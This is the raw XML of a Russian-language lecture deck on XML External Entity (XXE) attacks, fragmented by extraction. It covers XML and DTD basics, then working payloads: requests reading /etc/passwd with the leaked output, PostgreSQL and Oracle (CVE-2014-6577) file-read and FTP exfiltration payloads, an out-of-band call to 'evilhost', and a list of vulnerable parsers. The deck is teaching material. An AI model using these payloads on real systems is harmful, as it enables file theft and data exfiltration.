              <a:t>loadXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>() [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>domdocument.loadxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Invalid URI: http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQpbUmVzcG9uc2VSZXN1bHRdDQpSZXN1bHRDb2RlPTANCg==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>://127.0.0.1:81/ in Entity, line: 1 in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>home\localhost\www\xxe.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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93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только </a:t>
            </a:r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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> HTTP/1.1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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!DOCTYPE greeting [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>PUBLIC "any" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"file:///etc/passwd" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;greeting&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;&lt;/greeting&gt;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57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&lt;?xml version="1.0" standalone="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>При проверке документа XML- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>парсер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>в первую очередь ищет DTD внутри документа. Если правила внутри документа не определены и не задан атрибут </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>standalone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1"/>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>" , то </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>парсер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>загрузит указанный внешний файл и правила, находящиеся в нем, будут считаны оттуда. Если же атрибут </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1"/>
              <a:t>standalone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t> имеет значение "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" err="1"/>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>", то использование внешних DTD описаний будет запрещено.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="767352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PostgreSQL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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmlparse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(document '&lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE content [ &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/network/if-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>up.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mountnfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;]&gt;&lt;content&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;&lt;/content&gt;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; ERROR:  invalid XML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DETAILS:  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/network/if-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>up.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/mountnfs:28: parser error : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StartTag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: invalid element name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exec 9&lt;&amp;0 &lt;/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fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PostgreSQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>до 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lab.onsec.ru/2012/06/postgresql-all-error-based-xxe-0day.html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33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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xmltype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('&lt;?xml version="1.0" encoding=" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM " </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ftp://'||user||':bar@IP/test"&gt; %remote; %param1;]&gt;'),'/l') from dual;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  USER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>331 Password required for system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PASS ***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Oracle, CVE-2014-6577</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.securitylab.ru/analytics/471951.php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80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+1.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> trick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lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html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618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Парсеры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Java: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xerces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Crimson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Piccolo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SimpleXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMDocument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Perl: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twig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LibXml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.NET: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XmlReader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XmlDocument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Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etree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xml.sax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pulldom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lxml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Ruby: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REXML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rgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nokogiri</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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www.nds.rub.de/media/nds/arbeiten/2015/11/04/spaeth-dtd_attacks.pdf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63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Нужно больше презентаций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www.slideshare.net/d0znpp/onsec-phdays-2012-xxe-incapsulated-report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media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf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www.sans.org/reading-room/whitepapers/application/hands-on-xml-external-entity-vulnerability-training-module-34397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13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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;greeting&gt;Hello, world!&lt;/greeting&gt;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https://wikipedia.org/wiki/XML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1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Домашка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goo.gl/forms/YDWWo83gqljHr2Y33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03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Well-formed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&lt;order&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;product&gt;1234&lt;/product&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;count&gt;1&lt;/count&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/order&gt;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59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Если документ придерживается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DTD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML Schema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;!DOCTYPE order [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;!ELEMENT count (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;!ELEMENT product (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;!ELEMENT order (product, count)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;order&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;product&gt;1234&lt;/product&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;count&gt;1&lt;/count&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/order&gt;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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;!DOCTYPE order SYSTEM "order.dtd"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;order&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;product&gt;1234&lt;/product&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;count&gt;1&lt;/count&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/order&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000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order.dtd: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smtClean="0"/>
              <a:t>!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>order [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ELEMENT count (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ELEMENT product (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ELEMENT order (product, count)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]&gt;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5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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!DOCTYPE order SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>http://host/order.dtd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&lt;order&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;product&gt;1234&lt;/product&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;count&gt;1&lt;/count&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/order&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31877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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> HTTP/1.1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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!DOCTYPE greeting [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/greeting&gt;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HTTP/1.1 200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>OK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&lt;greeting&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>root:x:0:0:root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>:/root:/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>daemon:x:1:1:daemon:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sh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bin:x:2:2:bin:/bin:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sh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sys:x:3:3:sys:/dev:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sh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sync:x:4:65534:sync:/bin:/bin/sync</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>games:x:5:60:games:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/games:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sh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man:x:6:12:man:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/cache/man:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sh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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/greeting&gt;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81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проверить?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HTTP/DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>запрос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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DOCTYPE greeting [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SYSTEM "http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>://evilhost/check" &gt; ]&gt;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&lt;greeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>greeting&gt;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/>
              <a:t>&lt;!DOCTYPE greeting [</a:t>
            </a:r>
